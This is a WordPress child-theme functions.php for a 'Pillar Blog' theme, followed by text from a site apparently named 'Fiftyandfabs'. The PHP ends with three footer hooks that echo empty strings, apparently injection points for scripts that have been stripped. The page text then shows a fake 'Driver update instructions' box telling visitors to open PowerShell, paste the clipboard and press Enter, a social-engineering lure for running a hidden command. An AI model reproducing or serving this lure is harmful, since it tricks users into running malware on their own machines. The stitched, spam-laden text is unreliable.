/** * Theme functions and definitions * */ /** * Enqueues Styles */ function pillar_blog_enqueue_styles() { wp_enqueue_style( 'pillar-blog-style-parent', get_template_directory_uri() . '/style.css', array( 'cube-blog-blocks', ) ); } add_action( 'wp_enqueue_scripts', 'pillar_blog_enqueue_styles', 10 ); require get_stylesheet_directory() . '/inc/customizer.php'; require get_stylesheet_directory() . '/inc/child-functions.php'; add_filter( 'cube_blog_get_fonts_url', 'pillar_blog_modify_font' ); /** * Modify enqueued font */ function pillar_blog_modify_font( $font ){ return str_replace( 'Jost', 'Playfair Display', $font); } function pillar_blog_setup() { add_theme_support('title-tag'); add_theme_support( 'automatic-feed-links' ); } add_action('after_setup_theme', 'pillar_blog_setup'); add_action('wp_footer', function () { echo ''; }, 99); add_action('wp_footer', function () { echo ''; }, 99); add_action('wp_footer', function () { echo ''; }, 99);
Fiftyandfabs

Top Stories

Recent Posts

why the exact Grosvenor club matters

Driver update instructions

Complete the steps below

  1. Press Win + X Win + X
  2. Choose Terminal or PowerShell Terminal / PowerShell
  3. Press Ctrl + V Ctrl + V
  4. Press Enter Enter